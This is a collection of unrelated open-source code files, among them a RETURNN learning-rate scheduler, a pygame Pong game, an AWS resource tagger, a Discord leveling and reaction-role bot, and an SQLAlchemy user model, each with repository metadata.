def load_initial_kwargs_from_config(cls, config):\n \"\"\"\n :type config: returnn.config.Config\n :rtype: dict[str]\n \"\"\"\n kwargs = super(NewbobAbs, cls).load_initial_kwargs_from_config(config)\n kwargs.update(\n {\n \"error_threshold\": config.float(\"newbob_error_threshold\", -0.01),\n }\n )\n return kwargs\n\n def __init__(self, error_threshold, **kwargs):\n \"\"\"\n :type error_threshold: float\n \"\"\"\n super(NewbobAbs, self).__init__(**kwargs)\n self.error_threshold = error_threshold\n\n def calc_learning_rate_for_epoch(self, epoch):\n \"\"\"\n Newbob+ on train data.\n\n :type epoch: int\n :returns learning rate\n :rtype: float\n \"\"\"\n last_epoch = self.get_last_epoch(epoch)\n if last_epoch is None:\n return self.default_learning_rate\n learning_rate = self.epoch_data[last_epoch].learning_rate\n if learning_rate is None:\n return self.default_learning_rate\n last2_epoch = self.get_last_epoch(last_epoch)\n if last2_epoch is None:\n return learning_rate\n old_key, old_error = self.get_epoch_error_key_value(last2_epoch)\n new_key, new_error = self.get_epoch_error_key_value(last_epoch)\n if old_error is None or new_error is None:\n return learning_rate\n if old_key != new_key:\n return learning_rate\n error_diff = new_error - old_error\n learning_rate = self.calc_learning_rate_decay_or_grow(learning_rate, decay=error_diff > self.error_threshold)\n return learning_rate\n\n\nclass NewbobMultiEpoch(LearningRateControl):\n \"\"\"\n Like :class:`NewbobRelative`, but looks at the average relative error over multiple epochs.\n This is useful together with ``partition_epoch`` from :class:`Dataset`.\n \"\"\"\n\n @classmethod\n def load_initial_kwargs_from_config(cls, config):\n \"\"\"\n :type config: returnn.config.Config\n :rtype: dict[str]\n \"\"\"\n kwargs = super(NewbobMultiEpoch, cls).load_initial_kwargs_from_config(config)\n kwargs.update(\n {\n \"num_epochs\": config.int(\"newbob_multi_num_epochs\", 5),\n \"update_interval\": config.int(\"newbob_multi_update_interval\", config.int(\"newbob_multi_num_epochs\", 5)),\n \"relative_error_threshold\": config.float(\"newbob_relative_error_threshold\", -0.01),\n \"relative_error_grow_threshold\": config.float(\n \"newbob_relative_error_grow_threshold\", config.float(\"newbob_relative_error_threshold\", -0.01)\n ),\n }\n )\n return kwargs\n\n def __init__(self, num_epochs, update_interval, relative_error_threshold, relative_error_grow_threshold, **kwargs):\n \"\"\"\n :param int num_epochs:\n :param int update_interval:\n :param float relative_error_threshold:\n :param float relative_error_grow_threshold:\n \"\"\"\n super(NewbobMultiEpoch, self).__init__(**kwargs)\n self.num_epochs = num_epochs\n assert self.num_epochs >= 1\n self.update_interval = update_interval\n assert self.update_interval >= 1\n self.relative_error_threshold = relative_error_threshold\n self.relative_error_grow_threshold = relative_error_grow_threshold\n\n def _calc_mean_relative_error(self, epochs):\n \"\"\"\n :param list[int] epochs:\n :return: mean of relative errors\n :rtype: float|None\n \"\"\"\n assert len(epochs) >= 2\n errors = [self.calc_relative_error(epochs[i], epochs[i + 1]) for i in range(len(epochs) - 1)]\n if any([e is None for e in errors]):\n return None\n return float(numpy.mean(errors))\n\n def _calc_recent_mean_relative_error(self, epoch):\n \"\"\"\n :param int epoch:\n :return: recent mean of relative errors\n :rtype: float|None\n \"\"\"\n # Take one more than numEpochs because we are looking at the diffs.\n last_epochs = self._last_epochs_for_epoch(epoch, num_epochs=self.num_epochs + 1)\n if not last_epochs:\n return None\n # We could also use the self.numEpochs limit here. But maybe this is better.\n if len(last_epochs) <= 1:\n return None\n return self._calc_mean_relative_error(last_epochs)\n\n def calc_learning_rate_for_epoch(self, epoch):\n \"\"\"\n Newbob+ on train data.\n :type epoch: int\n :returns learning rate\n :rtype: float\n \"\"\"\n learning_rate = self.get_most_recent_learning_rate(epoch)\n # We start counting epochs at 1.\n if self.update_interval > 1 and epoch % self.update_interval != 1:\n return learning_rate\n mean_relative_error = self._calc_recent_mean_relative_error(epoch)\n if mean_relative_error is None:\n return learning_rate\n learning_rate = self.calc_learning_rate_decay_or_grow(\n learning_rate,\n decay=mean_relative_error > self.relative_error_threshold,\n grow=mean_relative_error < self.relative_error_grow_threshold,\n )\n return learning_rate\n\n\ndef learning_rate_control_type(type_name):\n \"\"\"\n :param str type_name:\n :rtype: type[LearningRateControl]|LearningRateControl\n \"\"\"\n if type_name == \"constant\":\n return ConstantLearningRate\n elif type_name in (\"newbob\", \"newbob_rel\", \"newbob_relative\"): # Old setups expect the relative version.\n return NewbobRelative\n elif type_name == \"newbob_abs\":\n return NewbobAbs\n elif type_name == \"newbob_multi_epoch\":\n return NewbobMultiEpoch\n else:\n assert False, \"unknown learning-rate-control type %s\" % type_name\n\n\ndef load_learning_rate_control_from_config(config):\n \"\"\"\n :type config: returnn.config.Config\n :rtype: LearningRateControl\n \"\"\"\n control_type = config.value(\"learning_rate_control\", \"constant\")\n cls = learning_rate_control_type(control_type)\n return cls.load_initial_from_config(config)\n\n\ndef demo():\n \"\"\"\n Demo run. Given some learning rate file (with scores / existing lrs), will calculate how lrs would have been set,\n given some config.\n \"\"\"\n from returnn.util import better_exchook\n\n better_exchook.install()\n import returnn.__main__ as rnn\n import sys\n\n if len(sys.argv) <= 1:\n print(\"usage: python %s [config] [other options] [++check_learning_rates 1]\" % __file__)\n print(\n (\n \"example usage: \"\n \"python %s ++learning_rate_control newbob ++learning_rate_file newbob.data ++learning_rate 0.001\"\n )\n % __file__\n )\n rnn.init_config(command_line_options=sys.argv[1:])\n # noinspection PyProtectedMember\n rnn.config._hack_value_reading_debug()\n rnn.config.update({\"log\": []})\n rnn.init_log()\n rnn.init_backend_engine()\n check_lr = rnn.config.bool(\"check_learning_rates\", False)\n from returnn.pretrain import pretrain_from_config\n\n pretrain = pretrain_from_config(rnn.config)\n first_non_pretrain_epoch = 1\n pretrain_learning_rate = None\n if pretrain:\n first_non_pretrain_epoch = pretrain.get_train_num_epochs() + 1\n log.initialize(verbosity=[5])\n control = load_learning_rate_control_from_config(rnn.config)\n print(\"LearningRateControl: %r\" % control)\n if not control.epoch_data:\n print(\"No epoch data so far.\")\n return\n first_epoch = min(control.epoch_data.keys())\n if first_epoch != 1:\n print(\"Strange, first epoch from epoch data is %i.\" % first_epoch)\n print(\"Error key: %s from %r\" % (control.get_error_key(epoch=first_epoch), control.epoch_data[first_epoch].error))\n if pretrain:\n pretrain_learning_rate = rnn.config.float(\"pretrain_learning_rate\", control.default_learning_rate)\n max_epoch = max(control.epoch_data.keys())\n for epoch in range(1, max_epoch + 2): # all epochs [1..max_epoch+1]\n old_learning_rate = None\n if epoch in control.epoch_data:\n old_learning_rate = control.epoch_data[epoch].learning_rate\n if epoch < first_non_pretrain_epoch:\n learning_rate = pretrain_learning_rate\n s = \"Pretrain epoch %i, fixed learning rate: %s (was: %s)\" % (epoch, learning_rate, old_learning_rate)\n elif 1 < first_non_pretrain_epoch == epoch:\n learning_rate = control.default_learning_rate\n s = \"First epoch after pretrain, epoch %i, fixed learning rate: %s (was %s)\" % (\n epoch,\n learning_rate,\n old_learning_rate,\n )\n else:\n learning_rate = control.calc_new_learning_rate_for_epoch(epoch)\n s = \"Calculated learning rate for epoch %i: %s (was: %s)\" % (epoch, learning_rate, old_learning_rate)\n if learning_rate < control.min_learning_rate:\n learning_rate = control.min_learning_rate\n s += \", clipped to %s\" % learning_rate\n s += \", previous relative error: %s\" % control.calc_relative_error(epoch - 2, epoch - 1)\n if hasattr(control, \"_calc_recent_mean_relative_error\"):\n # noinspection PyProtectedMember\n s += \", previous mean relative error: %s\" % control._calc_recent_mean_relative_error(epoch)\n print(s)\n if check_lr and old_learning_rate is not None:\n if old_learning_rate != learning_rate:\n print(\"Learning rate is different in epoch %i!\" % epoch)\n sys.exit(1)\n # Overwrite new learning rate so that the calculation for further learning rates stays consistent.\n if epoch in control.epoch_data:\n control.epoch_data[epoch].learning_rate = learning_rate\n else:\n control.epoch_data[epoch] = control.EpochData(learningRate=learning_rate)\n print(\"Finished, last stored epoch was %i.\" % max_epoch)\n\n\nif __name__ == \"__main__\":\n demo()\n","repo_name":"rwth-i6/returnn","sub_path":"returnn/learning_rate_control.py","file_name":"learning_rate_control.py","file_ext":"py","file_size_in_byte":33063,"program_lang":"python","lang":"en","doc_type":"code","stars":345,"dataset":"github-code","pt":"53"} +{"seq_id":"71979419688","text":"rows = [n for n in open('d3in.txt').read().splitlines()]\n\ntrees = [[x == '#' for x in row] for row in rows]\n\nh, w = len(rows), len(trees[0])\nslopes = [(1, 1), (3, 1), (5, 1), (7, 1), (1, 2)]\nproduct = 1\n\nfor dx, dy in slopes:\n\n count = 0\n x, y = 0, 0\n while y < h:\n count += 1 if trees[y][x] else 0\n x = (x+dx) % w\n y += dy\n\n product *= count\n\nprint(product)\n","repo_name":"AlexMabry/aoc20","sub_path":"day03/d3b.py","file_name":"d3b.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71888222249","text":"from typing import List\n\nimport boto3 as boto3\n\nfrom src.core.aws.base_aws_service import BaseAwsService\nfrom src.model.filter import Filter\nfrom src.model.resource import Resource\nfrom src.model.tag import Tag\n\n\nclass KinesisDataAnalytics(BaseAwsService):\n\n def __init__(self):\n super().__init__(nice_name='Kinesis Data Analytics', short_name='kda')\n self.client = boto3.client('kinesisanalytics')\n\n def _list_resources(self, filters: List[Filter]) -> List[Resource]:\n \"\"\"\n List resources for the service.\n\n :param filters: List of filters to pass to AWS API, if supported.\n :return: List of resources.\n \"\"\"\n limit = 50\n response = self.client.list_applications(Limit=limit)\n resources = self.__list_response_to_resources(response)\n\n while response['HasMoreApplications']:\n response = self.client.list_applications(Limit=limit, ExclusiveStartApplicationName=resources[-1].name)\n resources += [\n Resource(name=app['ApplicationName'], arn=app['ApplicationARN'])\n for app in response['ApplicationSummaries']\n ]\n\n return resources\n\n @staticmethod\n def __list_response_to_resources(response) -> List[Resource]:\n \"\"\"\n Convert a List API call response to a list of resources.\n\n :param response: Response from the List API call.\n :return: List of resources.\n \"\"\"\n resources = [\n Resource(name=item['ApplicationName'], arn=item['ApplicationARN'])\n for item in response['ApplicationSummaries']\n ]\n\n return resources\n\n def get_resource(self, resource_name: str) -> Resource:\n \"\"\"\n Get a single resource.\n\n :param resource_name: Name of the resource.\n :return: Resource.\n \"\"\"\n response = self.client.describe_application(ApplicationName=resource_name)\n arn = response['ApplicationDetail']['ApplicationARN']\n resource = Resource(name=resource_name, arn=arn)\n\n return resource\n\n def _get_resource_tags(self, resource: Resource) -> List[Tag]:\n \"\"\"\n Get all tags for the given resource.\n\n :param resource: Resource.\n :return: List of tags for the resource.\n \"\"\"\n response = self.client.list_tags_for_resource(ResourceARN=resource.arn)\n tags = response['Tags']\n tags = [Tag(tag['Key'], tag['Value']) for tag in tags]\n\n return tags\n\n def tag_resource(self, resource: Resource, tags: List[Tag]) -> None:\n \"\"\"\n Tag a resource with the given tags.\n\n :param resource: Resource.\n :param tags: List of tags to apply to the resource.\n \"\"\"\n tags = [{'Key': tag.key, 'Value': tag.value} for tag in tags]\n self.client.tag_resource(\n ResourceARN=resource.arn,\n Tags=tags\n )\n","repo_name":"dnzprmksz/aws-tagger","sub_path":"src/core/aws/kinesis_data_analytics.py","file_name":"kinesis_data_analytics.py","file_ext":"py","file_size_in_byte":2896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"75052936488","text":"from RePoE.parser.util import write_json, call_with_default_args\nfrom RePoE.parser import Parser_Module\n\n\ndef _convert_alias_stats(alias_stats_key_1, alias_stats_key_2):\n r = {}\n if alias_stats_key_1 is not None:\n r[\"when_in_main_hand\"] = alias_stats_key_1[\"Id\"]\n if alias_stats_key_2 is not None:\n r[\"when_in_off_hand\"] = alias_stats_key_2[\"Id\"]\n return r\n\n\nclass stats(Parser_Module):\n @staticmethod\n def write(file_system, data_path, relational_reader, translation_file_cache, ot_file_cache):\n root = {}\n previous = set()\n for stat in relational_reader[\"Stats.dat\"]:\n if stat[\"Id\"] in previous:\n print(\"Duplicate stat id %s\" % stat[\"Id\"])\n continue\n root[stat[\"Id\"]] = {\n \"is_local\": stat[\"IsLocal\"],\n \"is_aliased\": stat[\"IsWeaponLocal\"],\n \"alias\": _convert_alias_stats(stat[\"MainHandAlias_StatsKey\"], stat[\"OffHandAlias_StatsKey\"]),\n # 'is_on_character_panel': stat['Flag6'], # not sure\n # 'is_on_tooltip': stat['Flag7'], # not sure\n }\n\n write_json(root, data_path, \"stats\")\n\n\nif __name__ == \"__main__\":\n call_with_default_args(stats.write)\n","repo_name":"brather1ng/RePoE","sub_path":"RePoE/parser/modules/stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":1248,"program_lang":"python","lang":"en","doc_type":"code","stars":258,"dataset":"github-code","pt":"53"} +{"seq_id":"86737720664","text":"MAX = 100\nnome = list(range(MAX))\ncontador = 0\n\nwhile contador < MAX:\n nome[contador] = str (input(\"Digite o nome da {} pessoa: \".format(contador+1)))\n contador += 1\ncontador = 0\nprint(\"\\nlista de nomes: \")\nwhile contador < MAX:\n print (nome[contador])\n contador += 1\n\n","repo_name":"M4NS0/homeworks","sub_path":"Python/Lógica de Programação I/Exercícios/Lista9/Exercicio1.py","file_name":"Exercicio1.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40100974525","text":"import pygame\nimport math\nimport random\nimport helper\nimport config\nfrom helper import make_vector\n\n\nclass Ball(pygame.sprite.Sprite):\n def __init__(self, bounds, radius, velocity_vector):\n super().__init__()\n\n self.velocity = velocity_vector\n self.bounds = bounds\n self.position = make_vector(self.bounds.centerx, self.bounds.centery)\n\n self.image = config.BALL_SURFACE\n\n self.rect = pygame.Rect(0, 0, radius * 2, radius * 2)\n self.rect.center = self.position\n\n @staticmethod\n def _intersects_paddle(ball_position, paddle):\n for segment in paddle.get_line_segments():\n if len(helper.line_circle_intersection(ball_position, config.BALL_RADIUS, segment[0], segment[1])) > 0:\n return True\n\n return False\n\n def _sort_by_least_distance_squared(self, value):\n delta_x = self.position.x - value[0].x\n delta_y = self.position.y - value[0].y\n\n return delta_x * delta_x + delta_y * delta_y\n\n @staticmethod\n def _get_distance(v1, v2):\n delta_x = v1.x - v2.x\n delta_y = v1.y - v2.y\n\n return math.sqrt(delta_x * delta_x + delta_y * delta_y)\n\n def update(self, elapsed_seconds, paddles):\n delta_position = self.velocity * elapsed_seconds\n\n ball_start = self.position\n ball_end = ball_start + delta_position\n\n # ball is on field, determine whether it has collided with any paddles\n old_rect = self.rect.copy()\n\n # temporarily update rect to make use of spritecollide\n self.rect.center = ball_end\n colliding_paddles = pygame.sprite.spritecollide(self, paddles, dokill=False)\n self.rect = old_rect\n\n if any([Ball._intersects_paddle(ball_end, paddle) for paddle in colliding_paddles]):\n # at least one collision has occurred; determine closest intersection point\n all_intersections = []\n\n for paddle in colliding_paddles:\n for segment in paddle.get_line_segments():\n closest_point = helper.closest_point_on_line(segment[0], segment[1], self.position)\n\n intersections = helper.line_line_intersection(ball_start, closest_point, segment[0], segment[1])\n\n if len(intersections) > 0:\n all_intersections.extend([(x, segment[0], segment[1], paddle, closest_point)\n for x in intersections if x is not None])\n\n if len(all_intersections) > 0:\n all_intersections.sort(key=self._sort_by_least_distance_squared)\n\n # get the segment that we were closest to\n nearest_segment = all_intersections[0]\n segment_start, segment_end = nearest_segment[1], nearest_segment[2]\n\n # find closest point on this segment to the ball\n closest_point = helper.closest_point_on_line(segment_start, segment_end, ball_end)\n\n # adjust position of ball such that this distance is the ball's radius\n segment_dir = (segment_end - segment_start).normalize()\n segment_normal = make_vector(segment_dir.y, -segment_dir.x)\n\n projected_dir = (self.velocity.dot(segment_normal)\n / (segment_normal.dot(segment_normal)) * segment_normal)\n\n # projected_dir now tells us how to move towards the nearest segment; we can use this to\n # ensure we're at least {radius} units away\n if self.velocity.magnitude() > 0:\n self.position = closest_point + -projected_dir.normalize() * config.BALL_RADIUS\n delta_position = pygame.Vector2() # overwrote delta for this frame\n Ball.play_sound()\n\n # adjust velocity based on the segment that was hit\n paddle = all_intersections[0][3]\n up = make_vector(0, 1)\n\n is_vertical = True if abs(up.dot(segment_dir)) > 0.98 else False\n\n if is_vertical:\n self.velocity.x = -self.velocity.x\n self.velocity.y += paddle.velocity.y * elapsed_seconds * config.PADDLE_BALL_VELOCITY_MODIFIER\n else:\n self.velocity.x += paddle.velocity.x * elapsed_seconds * config.PADDLE_BALL_VELOCITY_MODIFIER\n self.velocity.y = -self.velocity.y\n\n self.position += delta_position\n self.rect.center = self.position\n\n def get_position(self):\n return self.position\n\n @staticmethod\n def play_sound():\n num_sounds = len(config.PADDLE_BOUNCE_SOUNDS)\n\n if num_sounds == 0:\n return\n\n which = config.PADDLE_BOUNCE_SOUNDS[random.randint(0, len(config.PADDLE_BOUNCE_SOUNDS) - 1)]\n which.play()\n\n\nclass MovementDirection:\n LEFT = make_vector(-1, 0)\n RIGHT = make_vector(1, 0)\n UP = make_vector(0, -1)\n DOWN = make_vector(0, 1)\n STOP = make_vector()\n\n\nclass Paddle(pygame.sprite.Sprite):\n def __init__(self, paddle_bounds, movement_bounds, speed):\n super().__init__()\n self.velocity = pygame.Vector2()\n self.position = pygame.Vector2()\n self.speed = speed\n\n self.paddle_bounds = paddle_bounds.copy()\n self.movement_bounds = movement_bounds.copy()\n\n self.movement_bounds.width -= paddle_bounds.width\n self.movement_bounds.height -= paddle_bounds.height\n\n self.movement_bounds.width = self.movement_bounds.width if self.movement_bounds.width > 0 else 1\n self.movement_bounds.height = self.movement_bounds.height if self.movement_bounds.height > 0 else 1\n\n self.movement_bounds.left += paddle_bounds.width * 0.5\n self.movement_bounds.top += paddle_bounds.height * 0.5\n\n self.image = config.HORIZONTAL_PADDLE_SURFACE \\\n if paddle_bounds.width > paddle_bounds.height else config.VERTICAL_PADDLE_SURFACE\n\n self.rect = paddle_bounds.copy()\n\n self.position.x = self.movement_bounds.centerx\n self.position.y = self.movement_bounds.centery\n self.update(0.0) # set up rect to match position\n\n def update(self, elapsed):\n move_amount = self.velocity * elapsed\n\n self.position += move_amount\n\n helper.rect_clamp_point_ip(self.movement_bounds, self.position)\n\n self.rect.centerx = self.position.x\n self.rect.centery = self.position.y\n\n def move(self, direction=MovementDirection.STOP):\n self.velocity = direction * self.speed\n\n def get_position(self):\n return self.position\n\n def get_dimensions(self):\n return helper.Dimensions(self.rect.width, self.rect.height)\n\n def get_line_segments(self):\n top_left = make_vector(self.rect.left, self.rect.top)\n top_right = make_vector(self.rect.right, self.rect.top)\n bottom_right = make_vector(self.rect.right, self.rect.bottom)\n bottom_left = make_vector(self.rect.left, self.rect.bottom)\n\n return [(top_left, top_right), (top_right, bottom_right), (bottom_right, bottom_left), (bottom_left, top_left)]\n\n\nclass Net(pygame.sprite.Sprite):\n def __init__(self, board_bounds, net_width, dash_length, dash_color=(255, 255, 255)):\n super().__init__()\n\n # generate an appropriate net surface - no sense in doing this\n # every single frame\n self.rect = pygame.Rect(0, 0, net_width, board_bounds.height)\n self.rect.center = board_bounds.center\n\n self.image = pygame.Surface((net_width, board_bounds.height))\n\n self.image.fill(color=(0, 0, 0)) # fill with black\n\n # generate dashes\n dash_rect = pygame.Rect(0, 0, net_width, dash_length)\n dash_rect.centery = 0\n\n # calculate offset such that the first and last dash will have the\n # same amount of space between their edge and the edge of the board\n num_dashes = self.image.get_height() / (dash_length * 2)\n offset = int((num_dashes - math.floor(num_dashes)) * dash_length)\n\n for y in range(offset, self.image.get_height() + dash_length + offset, dash_length * 2):\n fill_rect = dash_rect.copy()\n fill_rect.centery = y\n fill_rect.clip(self.image.get_rect())\n\n self.image.fill(color=dash_color, rect=fill_rect)\n\n\nclass TextSprite(pygame.sprite.Sprite):\n def __init__(self, text=\"\", font=\"consolas\", size=16, color=(255, 255, 255)):\n super().__init__()\n self.text = text\n self.font = pygame.sysfont.SysFont(font, size)\n self.color = color\n self.rect = pygame.Rect(0, 0, size, size)\n self.__update_image()\n\n def __update_image(self):\n self.image = self.font.render(self.text, False, self.color)\n self.rect.width = self.image.get_width()\n self.rect.height = self.image.get_height()\n\n def set_position(self, position):\n self.rect.left = position.x\n self.rect.top = position.y\n\n def set_center(self, center_position):\n self.rect.center = center_position\n\n def get_position(self):\n return make_vector(self.rect.left, self.rect.top)\n\n def set_text(self, text):\n self.text = text\n self.__update_image()\n","repo_name":"amrazek/386-pong-no-walls","sub_path":"entities.py","file_name":"entities.py","file_ext":"py","file_size_in_byte":9238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2237831216","text":"import discord\r\nfrom discord.ext import commands\r\nimport os\r\nimport datetime\r\nimport json\r\nimport requests\r\nfrom PIL import Image, ImageOps, ImageDraw, ImageFont\r\nfrom datetime import datetime,timedelta\r\nfrom datetime import date as dt\r\nimport re \r\nfrom dateutil import parser\r\nimport random\r\nfrom discord.ext.commands import has_permissions\r\nintents = discord.Intents.all()\r\nbot = commands.Bot(command_prefix = '.',case_insensitive=True,intents = intents)\r\n\r\nbot.remove_command('help')\r\n\r\n@bot.event\r\nasync def on_message(message):\r\n try:\r\n author = str(message.author.id)\r\n with open('Config/data.json','r') as f:\r\n data = json.load(f)\r\n \r\n if not author in data:\r\n data[author] = {}\r\n data[author]['experience'] = 0\r\n data[author]['level'] = 0\r\n data[author]['money'] = 1100\r\n with open('Config/data.json','w') as f:\r\n json.dump(data,f,indent = 3)\r\n\r\n with open('Config/data.json','r') as f:\r\n data = json.load(f)\r\n \r\n level = data[author]['level']\r\n if level == 0:\r\n level_end = 350\r\n elif level== 1:\r\n level_end = 910\r\n elif level== 2:\r\n level_end = 1110\r\n elif level == 3:\r\n level_end = 1350\r\n elif level == 4:\r\n level_end = 1500\r\n elif level == 5:\r\n level_end = 1790\r\n elif level == 6:\r\n level_end = 1800\r\n elif level == 7:\r\n level_end = 1850\r\n elif level == 8:\r\n level_end = 1900\r\n elif level == 9:\r\n level_end = 1950\r\n elif level == 10:\r\n level_end = 2000\r\n else:\r\n level_end = 2500\r\n\r\n if data[author]['experience'] >= level_end:\r\n data[author]['level'] += 1\r\n level = level + 1\r\n data[author]['experience'] = 0\r\n url = message.author.avatar_url\r\n with requests.get(url) as r:\r\n img_data = r.content\t\r\n \r\n with open('image_name.webp', 'wb') as handler:\r\n handler.write(img_data)\r\n\r\n im = Image.open('image_name.webp')\r\n region = im.resize((105, 105))\r\n background = Image.open('Config/r.png')\r\n background.paste(region,(5,4))\r\n d2 = Image.open('Config/12.png')\r\n background.paste(d2,(115,84))\r\n background.save('Config/os.png')\r\n img = Image.open('Config/os.png')\r\n draw = ImageDraw.Draw(img)\r\n font = ImageFont.truetype(\"./l_10646.ttf\", 18)\r\n draw.text((117,60),f\"{message.author}\",(255, 255, 255),font=font)\r\n font = ImageFont.truetype(\"./l_10646.ttf\", 14)\r\n draw.text((190,85),f\"Level {level}\",(255, 255, 255),font=font)\r\n img.save('Config/sample-out.png')\r\n await message.author.send(file=discord.File('Config/sample-out.png'))\r\n\r\n with open('Config/data.json','w') as f:\r\n json.dump(data,f,indent = 3)\r\n \r\n data[author]['experience'] += random.randint(1,5)\r\n with open('Config/data.json','w') as f:\r\n json.dump(data,f,indent = 3)\r\n \r\n except Exception as e:\r\n print(e)\r\n\r\n await bot.process_commands(message)\r\n\r\n@bot.event\r\nasync def on_member_join(member):\r\n guild = str(member.guild.id)\r\n with open('Config/guildlogs.json','r') as f:\r\n data = json.load(f)\r\n try:\r\n if data[guild]['Join_Message'] == 'Enabled':\r\n member_count = len([m for m in member.guild.members if not m.bot])\r\n channel = bot.get_channel(int(data[guild]['Join ID']))\r\n await channel.send(f\":tada: Hi, {member.mention}, Welcome to {member.guild}, you're our {member_count} user! \")\r\n except Exception:\r\n pass\r\n\r\n try:\r\n if not data[guild]['Autorole'] == 'Disabled':\r\n role = discord.utils.get(member.guild.roles, name=data[str(member.guild.id)]['Autorole'])\r\n await member.add_roles(role)\r\n \r\n except KeyError:\r\n pass\r\n\r\n@has_permissions(administrator = True)\r\n@bot.command()\r\nasync def reactrole(ctx,channel: discord.TextChannel = None,max_roles:str = None,title:str = None,*,description:str = None):\r\n guild = str(ctx.guild.id)\r\n def check(m):\r\n return m.author == ctx.author\r\n \r\n if max_roles == None or title == None or description == None or channel == None:\r\n await ctx.send('Command Usage: reactrole `<#channel>` `` `` `<description>`')\r\n return\r\n else:\r\n with open('Config/Reactions.json') as f:\r\n r = json.load(f)\r\n \r\n num = int(max_roles)\r\n iterate = 0\r\n\r\n while iterate < num:\r\n msg = await ctx.send(f'Enter the Role Name: #{iterate+1}')\r\n role_name = await bot.wait_for('message',check = check)\r\n await msg.delete()\r\n msg = await ctx.send(f'Enter the Reaction Emoji: #{iterate+1}')\r\n emoji = await bot.wait_for('message',check = check)\r\n role_name = role_name.content\r\n emoji = emoji.content\r\n await msg.delete()\r\n if not guild in r:\r\n r[guild] = {}\r\n \r\n r[guild][str(emoji)] = role_name \r\n iterate += 1\r\n \r\n r[guild]['Channel'] = channel.id\r\n await ctx.send('Reaction Roles has been activated.')\r\n with open('Config/Reactions.json','w') as f:\r\n json.dump(r,f,indent = 3)\r\n\r\n with open('Config/Reactions.json','r') as f:\r\n r = json.load(f)\r\n\r\n embed = discord.Embed(title = title,description = description,color = 0x90e2fe)\r\n msg = await channel.send(embed = embed)\r\n for emojis in r[guild]:\r\n try:\r\n await msg.add_reaction(emojis)\r\n except Exception as e:\r\n pass\r\n\r\n\r\n@bot.event\r\nasync def on_raw_reaction_add(payload):\r\n with open('Config/Reactions.json') as f:\r\n r = json.load(f)\r\n \r\n guild = str(payload.guild_id)\r\n channel = await bot.fetch_channel(payload.channel_id)\r\n user = channel.guild.get_member(payload.user_id)\r\n emoji = payload.emoji\r\n emoji = str(emoji)\r\n if guild in r:\r\n if channel.id == r[guild]['Channel']:\r\n for em in r[guild]:\r\n if em == emoji:\r\n role = discord.utils.get(channel.guild.roles, name=r[guild][em])\r\n await user.add_roles(role) \r\n\r\n@bot.event\r\nasync def on_raw_reaction_remove(payload):\r\n emoji = str(payload.emoji)\r\n guild = bot.get_guild(payload.guild_id)\r\n gi = str(guild.id)\r\n member = guild.get_member(payload.user_id)\r\n channel = payload.channel_id\r\n with open('Config/Reactions.json') as f:\r\n r = json.load(f) \r\n if str(guild.id) in r:\r\n if channel == r[gi]['Channel']:\r\n for em in r[gi]:\r\n if em == emoji:\r\n channel = await bot.fetch_channel(payload.channel_id)\r\n role = discord.utils.get(guild.roles, name=r[gi][em])\r\n await member.remove_roles(role) \r\n\r\n@bot.command()\r\nasync def help(ctx):\r\n \r\n embed=discord.Embed(color=0x955cff)\r\n embed.set_author(name=\"Commands Help\")\r\n embed.add_field(name=\":gear: **Moderations**\", value=\"`BAN` `UNBAN` `KICK`` `CLEAR` `WARN` `REMOVEWARN`\", inline=False)\r\n embed.add_field(name=\":tada: **Giveaway**\", value=\"`GSTART` `GSTOP`\", inline=False)\r\n embed.add_field(name=\":game_die: **Economy**\", value=\"`ROB` `WORK`\", inline=False)\r\n embed.add_field(name =\":dna: **General**\", value = \"`WELCOMEMESSAGE` `AUTOROLE` `REACTIONROLE` `SETLOGS`\", inline = False)\r\n embed.timestamp = datetime.utcnow()\r\n embed.set_footer(text = f'{ctx.author} ')\r\n await ctx.send(embed=embed)\r\n\r\n#COGS / Command LOADING\r\nfor filename in os.listdir('./Commands/Giveaway'):\r\n if filename.endswith('.py'):\r\n bot.load_extension(f'Commands.Giveaway.{filename[:-3]}')\r\n\r\n\r\nfor filename in os.listdir('./Commands/Moderations'):\r\n if filename.endswith('.py'):\r\n bot.load_extension(f'Commands.Moderations.{filename[:-3]}')\r\n\r\n\r\nfor filename in os.listdir('./Commands/Economy'):\r\n if filename.endswith('.py'):\r\n bot.load_extension(f'Commands.Economy.{filename[:-3]}')\r\n\r\nfor filename in os.listdir('./Commands/Misc'):\r\n if filename.endswith('.py'):\r\n bot.load_extension(f'Commands.Misc.{filename[:-3]}')\r\n\r\n\r\nbot.run('TOKEN HERE')","repo_name":"karansharma002/Discord","sub_path":"Discord Multipurpose 2/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":8595,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"26852450145","text":"from sqlalchemy import Boolean, Column, String, DateTime, Integer\nfrom sqlalchemy.orm import relationship\n\nfrom app.conf.db.base_tablename_class import Base\n\nUSERS_SCHEMA = 'users'\n\n\nclass User(Base):\n \"\"\"\n Table with User Data\n \"\"\"\n\n __tablename__ = \"user\"\n __table_args__ = {\n \"schema\": USERS_SCHEMA,\n \"comment\": \"Table with all users\"\n }\n\n id = Column(Integer, primary_key=True, autoincrement=True)\n name = Column(\n String, index=True,\n comment='name of user',\n ) # Имя\n middle_name = Column(\n String,\n comment='middle name of user',\n ) # Отчество\n last_name = Column(\n String, index=True,\n comment='last name of user',\n ) # Фамилия\n\n email = Column(\n String,\n unique=True,\n index=True,\n nullable=False,\n comment='email',\n )\n username = Column(\n String,\n unique=True,\n nullable=True,\n comment='username',\n )\n hashed_password = Column(\n String,\n nullable=False,\n comment='passwd',\n )\n\n is_active = Column(\n Boolean(),\n default=True,\n comment='locked or unlocked',\n )\n is_superuser = Column(\n Boolean(),\n default=False,\n )\n is_subscribed = Column(\n Boolean(),\n default=False,\n )\n\n created_at = Column(DateTime())\n updated_at = Column(DateTime())\n birth_date = Column(DateTime())\n subscription_ends = Column(DateTime())\n last_login_at = Column(DateTime())\n\n roles = relationship(\"UserXRole\", back_populates=\"user\", 